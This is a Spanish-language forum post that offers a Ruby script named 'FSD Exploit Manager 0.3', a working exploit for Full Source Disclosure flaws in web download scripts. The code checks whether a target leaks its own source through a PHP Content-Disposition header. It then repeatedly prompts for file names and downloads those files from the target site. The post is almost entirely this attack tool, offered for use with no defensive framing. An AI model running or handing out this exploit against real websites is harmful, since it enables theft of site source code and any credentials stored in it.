13 Years of Service
57%
Un simple script en Ruby que sirve como exploit para la vulnerabilidad Full Source Discloure.
El codigo :
Eso es todo.
El codigo :
Code:
>
#!usr/bin/ruby
#FSD Exploit Manager 0.3
require "open-uri"
require "net/http"
# Functions
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def uso
print "\n[+] Sintax : ruby locateip.rb \n"
end
def head
print "\n\n-- == FSD Exploit Manager 0.3 == --\n\n"
end
def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
exit(1)
end
def installer
if not Dir.exists?("logs")
Dir.mkdir "logs"
end
Dir.chdir("logs")
end
def download(file,name)
File.open(name, "wb") do |saved_file|
open(file, "rb") do |read_file|
saved_file.write(read_file.read)
end
end
end
def scan_fsd(target)
print "\n[+] Scanning ...\n\n"
path = File.basename(URI(target).path)
code = toma(target+path)
if code=~/header\((.*)Content-Disposition: attachment;/
print "[+] Vulnerable !\n"
while(1)
print "\n[+] Insert Filename : "
filename = STDIN.gets.chomp
if filename=="exit"
copyright()
else
download(target+filename,filename)
print "\n[+] Downloaded !\n"
end
end
else
print "[-] Not vulnerable\n"
end
end
target = ARGV[0]
installer()
head()
if !target
uso()
else
scan_fsd(target)
end
copyright()
#The End ?
Last edited by a moderator: